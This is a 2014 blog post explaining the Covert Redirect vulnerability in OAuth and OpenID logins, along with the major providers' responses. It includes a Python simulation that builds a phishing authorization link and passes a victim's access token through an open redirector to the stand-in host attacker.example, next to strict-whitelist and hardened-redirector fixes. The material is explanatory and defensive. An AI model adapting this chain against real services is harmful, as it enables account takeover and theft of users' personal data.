醉雨他乡游's blog

Recording the little things in life: joys and sorrows, memories and hopes, successes and failures, the sweet, the sour, the bitter and the spicy

Posts
Nasty Covert Redirect Vulnerability found in OAuth and OpenID  

2014-10-02 15:59:20 | Category: News | Tags: (none)
Following the Heartbleed bug, a flaw in the widely used open-source OpenSSL library that put countless websites at risk, another vulnerability has been disclosed, this time affecting sites that rely on the popular authentication protocol OpenID and the authorization protocol OAuth.

 

Wang Jing, a Chinese mathematics Ph.D. student at Nanyang Technological University in Singapore, found that many sites implementing the OAuth and OpenID open standards are vulnerable to an attack he named "Covert Redirect".

 

OAuth and OpenID are widely used open standards for delegated login. OAuth is an authorization protocol designed so that users can sign in to, or sign up for, a service using an existing identity at a site such as Google, Facebook, Microsoft or Twitter, whereas OpenID is a decentralized authentication system that lets users log in to websites across the internet with the same digital identity.
The Covert Redirect vulnerability could affect anyone who uses OAuth or OpenID to log in to third-party sites through identity providers such as Facebook, Google, Yahoo, LinkedIn, Microsoft, VK, Mail.Ru, PayPal, GitHub and many others.

 

WHAT MAKES IT EVEN MORE DANGEROUS?

The Covert Redirect flaw lets an attacker present the victim with a genuine login popup from the affected site, steal the personal data the user releases, and then redirect the user to a website of the attacker's choice, which could further compromise the victim.

 

A victim who clicks a malicious phishing link is shown a popup window from Facebook itself, asking them to authorize the app. Ordinary phishing hoaxes the user into entering information on a look-alike site; Covert Redirect instead uses the real site's address for the authentication step, so the address bar shows the legitimate domain. The trick is in the redirect_uri parameter of the authorization request: it points at an open redirector on a legitimate, registered client domain, which then forwards the user, together with the token or data appended to the URL, to the attacker.

 

Once the user logs in, the attacker obtains the personal data, which in the case of Facebook could include the email address, birth date, contacts, work history and so on.

 

If the token carries broader privileges, the attacker could obtain more sensitive information, including the mailbox, friends list and online presence, and quite possibly operate and control the user's account.


In his blog post, Jing explained that for OAuth 2.0 the attack exposes the site user's token: whenever the user authorizes the login, the attacker can use that token to access the user's private information. In the case of OpenID, the attacker obtains the user's information directly, because it is transferred from the provider immediately upon request.

 

However, this is not the first time the issue has been raised. The root cause is the lack of strict redirect-URI whitelisting in OAuth 2.0 deployments: a provider that accepts any URL on a registered domain, rather than an exact pre-registered value, will hand the access token or authorization code to any open redirector on that domain. The OAuth 2.0 specification (RFC 6749, section 3.1.2.2) already says the authorization server should require registration of the complete redirection URI; the problem is that many providers and applications do not enforce it.



 

RESPONSE FROM INTERNET GIANTS 

Facebook uses OAuth and something similar to OpenID. When Jing reported the vulnerability to Facebook, the company said “they understand the risks associated with OAuth 2.0. However, short of forcing every single application on the platform to use a whitelist, [fixing the vulnerability] isn't something that can be accomplished in the short term.”

 

Facebook is not the only site affected. Jing reported the vulnerability to other companies that use OAuth or OpenID, including Google, LinkedIn, Microsoft and Yahoo, to discuss the problem.

 

Google, which uses OpenID, told Jing that “they are aware of the problem and are tracking it at the moment,” whereas LinkedIn said it had acknowledged the problem back in March and “published a blog post on how [they] intend to address [the problem].”

 

Microsoft replied that, after investigating, it had concluded the vulnerability lay in a third-party domain different from the one Jing reported, and recommended that he report the issue to that third party instead.

 

Yahoo had not replied months after he reported the issue.

“They have little incentive to fix the problem,” Jing wrote of the companies. “One concern is the cost and the other is that in their view, the host company is responsible for making the attacks appear more credible; therefore, it is not solely their problem.”

 





HOW TO FIX COVERT REDIRECT VULNERABILITY 

According to Jing, there is no quick fix. The remedy is for each third-party application to register a strict whitelist of redirect URIs with the provider, and for providers to enforce it, but, he wrote, “In the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable.”
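The attack chain described under WHAT MAKES IT EVEN MORE DANGEROUS above, and the whitelist fix this section refers to, modelled end to end in Python. This is an added example written for this page, not Wang Jing's proof of concept or any provider's code. The hostnames provider.example, client.example and attacker.example, the paths, the client_id and the token value are all hypothetical; the provider is assumed to use the OAuth 2.0 implicit grant, which returns the access token in the URL fragment.

```python
"""Covert Redirect modelled end to end (added example; hosts, paths and
token values are hypothetical, not taken from any real provider).

  provider.example  OAuth 2.0 authorization server, implicit grant
  client.example    legitimate relying party registered at the provider,
                    with an open redirector at /go?next=<url>
  attacker.example  attacker's collection endpoint
"""
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

CLIENT_ID = "demo-client"  # hypothetical registered client
# The exact redirect URI the client registered with the provider.
REGISTERED_REDIRECT_URIS = {"https://client.example/oauth/callback"}


def loose_redirect_uri_check(redirect_uri: str) -> bool:
    """Permissive check many providers used: any https URL whose host is the
    registered host (or a subdomain of it) is accepted."""
    p = urlsplit(redirect_uri)
    hosts = {urlsplit(u).hostname for u in REGISTERED_REDIRECT_URIS}
    host = p.hostname or ""
    return p.scheme == "https" and any(
        host == h or host.endswith("." + h) for h in hosts)


def strict_redirect_uri_check(redirect_uri: str) -> bool:
    """The fix: exact match against the pre-registered whitelist, as RFC 6749
    section 3.1.2.2 recommends (register the complete redirection URI)."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def malicious_redirect_uri() -> str:
    """On the legitimate client's domain, so a host-only check passes, but
    its ?next= aims the client's open redirector at the attacker."""
    return "https://client.example/go?" + urlencode(
        {"next": "https://attacker.example/collect"})


def build_attack_link() -> str:
    """What the phishing mail carries. The victim sees the real
    provider.example address, not an impostor domain."""
    return "https://provider.example/oauth/authorize?" + urlencode({
        "client_id": CLIENT_ID,
        "response_type": "token",  # implicit grant: token in fragment
        "redirect_uri": malicious_redirect_uri(),
    })


def provider_authorize(redirect_uri: str,
                       check: Callable[[str], bool]) -> Optional[str]:
    """Simulates the genuine consent popup: the victim clicks Authorize and
    the provider redirects to redirect_uri with the token in the fragment.
    Returns None when the provider's policy rejects the redirect_uri."""
    if not check(redirect_uri):
        return None
    return redirect_uri + "#" + urlencode(
        {"access_token": "tok-SECRET", "token_type": "bearer"})


def client_open_redirector(url: str) -> Optional[str]:
    """Vulnerable /go handler: 302 to whatever ?next= says. A Location header
    without a fragment makes the browser re-attach the fragment of the URL it
    was on, so #access_token=... travels along to the new host."""
    parts = urlsplit(url)
    target = parse_qs(parts.query).get("next", [None])[0]
    if target is None:
        return None
    return target + ("#" + parts.fragment if parts.fragment else "")


def hardened_redirector(url: str) -> Optional[str]:
    """Fixed /go handler: only same-site relative paths are followed. Absolute
    URLs, protocol-relative //host and backslash variants (which browsers
    normalise to slashes) are refused."""
    parts = urlsplit(url)
    target = parse_qs(parts.query).get("next", [""])[0]
    t = urlsplit(target)
    if (t.scheme or t.netloc or "\\" in target
            or not target.startswith("/") or target.startswith("//")):
        return None
    return "https://client.example" + target + (
        "#" + parts.fragment if parts.fragment else "")


def run_attack(check: Callable[[str], bool]) -> Optional[str]:
    """Whole chain from the victim's click to where the browser lands, under
    the provider's redirect_uri policy `check`."""
    # 1. Victim clicks the phishing link; browser requests provider.example.
    params = parse_qs(urlsplit(build_attack_link()).query)
    redirect_uri = params["redirect_uri"][0]
    # 2. Victim sees the REAL provider consent popup and authorizes.
    landing = provider_authorize(redirect_uri, check)
    if landing is None:
        return None  # provider refused the redirect_uri: chain is dead
    # 3. Browser follows to client.example/go, which forwards to ?next=.
    return client_open_redirector(landing)


if __name__ == "__main__":
    print("loose provider :", run_attack(loose_redirect_uri_check))
    print("strict provider:", run_attack(strict_redirect_uri_check))
```

Either party can break the chain on its own: a provider that enforces `strict_redirect_uri_check` never releases the token to the redirector, and a client that replaces its `/go` handler with `hardened_redirector` never forwards it off-site even if the provider is loose. That is exactly why each side can argue the other is responsible, as the companies' replies above show.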

 

Jing believes it is unlikely the flaw will be patched any time soon: neither the identity providers such as Google, Microsoft and Facebook, nor the client companies, are taking responsibility for fixing it.

 

Exploiting Covert Redirect does require user interaction: the victim has to click a link or visit a malicious website, then click the Facebook login button and agree to authorize the login and the release of information.

 

So far security experts have not rated this vulnerability as severe a flaw as Heartbleed, but it remains a real threat.
NetEase Company. All rights reserved ©1997-2017